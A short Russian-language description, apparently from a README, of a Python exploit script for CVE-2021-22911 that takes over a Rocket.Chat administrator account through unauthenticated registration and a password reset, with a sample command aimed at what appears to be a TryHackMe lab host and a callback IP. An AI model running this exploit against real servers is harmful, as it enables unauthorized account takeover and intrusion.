
Python-эксплойт-скрипт для CVE-2021-22911, нацеленный на сброс пароля администратора Rocket.Chat через неавторизованную регистрацию пользователя. Автоматизирует эксплуатацию с настраиваемой целью, именем пользователя администратора и IP-адресом для обратного вызова.
Если вы уже зарегистрировали пользователя, будет сброшен только пароль администратора, а не оба. Это делает запуск эксплойта намного быстрее.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80